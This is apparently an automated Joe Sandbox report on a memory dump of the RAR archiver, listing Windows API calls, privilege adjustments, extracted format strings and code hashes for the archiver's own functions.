• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A4549
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                                                                                        • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                        • Instruction ID: 4ecfab74eefad07a441e5cebed15ed149783ea7a1f92d439a2a062f7333b0fc1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63C08C25F02881C0C645532988450281111AF44735F900372C13E452E0CE1848AB0300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                        • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                        • Instruction ID: f61ee5e72e45c4c67ec42f8ff9919b4f3211e0779a65c3b3ef1040c100f0c26c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05F0FF32A0A242E8FB268B20E4403782252DB00BB8F589372D63D810D8DE28CC9BC350
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1C49F4: LoadStringW.USER32 ref: 00007FF6AA1C4A7B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1C49F4: LoadStringW.USER32 ref: 00007FF6AA1C4A94
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6AA19CBED,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1CB730
                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1A6CB0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                                                                                        • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                                                                                        • API String ID: 668332963-4283793440
                                                                                                                                                                                                                                        • Opcode ID: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
                                                                                                                                                                                                                                        • Instruction ID: 747caf77c1173154ef313557ca55978d06f721ff2cf49c7d7ff60d438773cc39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C228222A0E6C2E5EB22DB34D8501FD67A2FF45344F8440B7D65D8769ADE2CEE4AC740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 00007FF6AA19D4A6
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00007FF6AA19D4B9
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF73
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF84
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6AA19EFA7
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6AA19EFCA
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: GetLastError.KERNEL32 ref: 00007FF6AA19EFD4
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: CloseHandle.KERNEL32 ref: 00007FF6AA19EFE7
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 00007FF6AA19D4C6
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 00007FF6AA19D64A
                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00007FF6AA19D68B
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00007FF6AA19D69A
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00007FF6AA19D6AD
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32 ref: 00007FF6AA19D6FA
                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF6AA19D705
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A2310: FlushFileBuffers.KERNEL32 ref: 00007FF6AA1A233E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A2310: SetFileTime.KERNEL32 ref: 00007FF6AA1A23DB
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A1930: CloseHandle.KERNELBASE ref: 00007FF6AA1A1958
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A39E0: SetFileAttributesW.KERNEL32(?,00007FF6AA1A34EE,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A3A0F
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A39E0: SetFileAttributesW.KERNEL32(?,00007FF6AA1A34EE,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A3A3C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 2750113785-3508440684
• Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
• Instruction ID: f0a77f590d7bdc6e3d8576e745450229496ca1770cbaff4443317a007488d377
• Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
• Instruction Fuzzy Hash: B9D1CF26A0A686E6EB629F20D9406FD27A0FF40798F404177DA9D876D9DF3CD90BC700
APIs
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAEE9
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAF01
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAF19
• GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAF75
• GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAFB0
• SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CB23B
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CB244
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CB287
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
• String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
• API String ID: 3483800833-4165214152
• Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
• Instruction ID: ddae254502067edb3ae5358c8eb2397253bea820ca3ca6f09f8db10ffa4e3121
• Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
• Instruction Fuzzy Hash: 6AC18036A0AB81E5EB62DF21E8502BD27A1FF44B94F444076DA4E87795DF3CE946C700
APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3729174658-3733053543
• Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction ID: c3d4aee32c15913bd71dae828e08157b52ee13b1954f085a104efab39b897a82
• Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction Fuzzy Hash: F521AE32A1A682D2F791DB21E89537E63A1EF84744F90507BEA0E86558DF3DEC4A8700
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E298
• FindClose.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E2AB
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E2F7
  • Part of subcall function 00007FF6AA19EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF73
  • Part of subcall function 00007FF6AA19EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF84
  • Part of subcall function 00007FF6AA19EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6AA19EFA7
  • Part of subcall function 00007FF6AA19EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6AA19EFCA
  • Part of subcall function 00007FF6AA19EF50: GetLastError.KERNEL32 ref: 00007FF6AA19EFD4
  • Part of subcall function 00007FF6AA19EF50: CloseHandle.KERNEL32 ref: 00007FF6AA19EFE7
• DeviceIoControl.KERNEL32 ref: 00007FF6AA19E357
• CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E362
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                        • String ID: SeBackupPrivilege
                                                                                                                                                                                                                                        • API String ID: 3094086963-2429070247
                                                                                                                                                                                                                                        • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                        • Instruction ID: 27cb79afddc4925e40a3f967b5b56ba73ebb213a2d5c60e910e106165e97e8a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A961D032A09681E6EB268B21E5406FD33A0FB44794F404277DB6E87AD4DF3CE956C700

APIs
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: Sleepswprintf
• String ID: $%ls%0*u.rev
• API String ID: 407366315-3491873314
• Opcode ID: 6228c723871ebb1e8296c1b1a0c22d4504545d7a69b0f2f459d85dbf46e0c821
• Instruction ID: ed1d643cfc803812b5597adba8741ce439a356dbd86c186a1ae796dfeb9cd276
• Opcode Fuzzy Hash: 6228c723871ebb1e8296c1b1a0c22d4504545d7a69b0f2f459d85dbf46e0c821
• Instruction Fuzzy Hash: 8902F532B0A682D6EB21DF25E4842AD77A5FB88784F410177DE5D87B96DE3CE846C700

APIs
• new.LIBCMT ref: 00007FF6AA184BD8
  • Part of subcall function 00007FF6AA1CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6AA19CBED,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1CB730
  • Part of subcall function 00007FF6AA1A1E80: CreateFileW.KERNELBASE ref: 00007FF6AA1A1F4A
  • Part of subcall function 00007FF6AA1A1E80: GetLastError.KERNEL32 ref: 00007FF6AA1A1F59
  • Part of subcall function 00007FF6AA1A1E80: CreateFileW.KERNELBASE ref: 00007FF6AA1A1F99
  • Part of subcall function 00007FF6AA1A1E80: GetLastError.KERNEL32 ref: 00007FF6AA1A1FA2
  • Part of subcall function 00007FF6AA1A1E80: SetFileTime.KERNEL32 ref: 00007FF6AA1A1FF1
Strings
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: File$CreateErrorLast$SleepTime
• String ID: %12s %s$%12s %s$ $%s
• API String ID: 2965465231-221484280
• Opcode ID: a57dd3f3df4f1046b3036346f8c71d84d6573ec975a401307e0b985712f7f48f
• Instruction ID: 5992452ca4167017ed0fc16ba0828dbb52f1a375e38e4233027c57211b2ce6ab
• Opcode Fuzzy Hash: a57dd3f3df4f1046b3036346f8c71d84d6573ec975a401307e0b985712f7f48f
• Instruction Fuzzy Hash: 44F1C122B0AA82E6EB62DB22D4502BD67A1FB48BC4F444477DA4D87785DF3CED56C700

APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
• Instruction ID: 5a2ac23e18356972cef1ca304da4f4070965b162fd2b450f09ad2c513136f70f
• Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
• Instruction Fuzzy Hash: 31316136609B81DADB61CF25E8402BE73A4FB89754F540136EA9D83B58DF3CD946CB00

APIs
Memory Dump Source
• Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
• Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
Similarity
• API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 3398352648-0
• Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
• Instruction ID: b562f9a8d879f38552c6ab3cc845e33a920eb46b2553fd1be0bc5363ac0799d2
• Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
• Instruction Fuzzy Hash: DB116335619741D6EB508F21E84056E73A0FF88B80F44413BEA8E83658DF3CE806CB40
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
